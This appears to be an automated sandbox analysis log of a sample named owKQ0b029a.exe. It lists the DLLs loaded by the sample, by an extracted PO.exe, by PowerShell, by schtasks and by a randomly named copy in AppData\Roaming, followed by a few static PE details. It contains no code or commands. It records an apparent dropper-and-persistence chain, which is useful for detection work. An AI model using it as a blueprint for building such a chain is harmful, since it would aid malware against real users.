                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: msvcp140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: owKQ0b029a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: owKQ0b029a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: owKQ0b029a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: owKQ0b029a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: owKQ0b029a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: owKQ0b029a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: owKQ0b029a.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: owKQ0b029a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: owKQ0b029a.exe
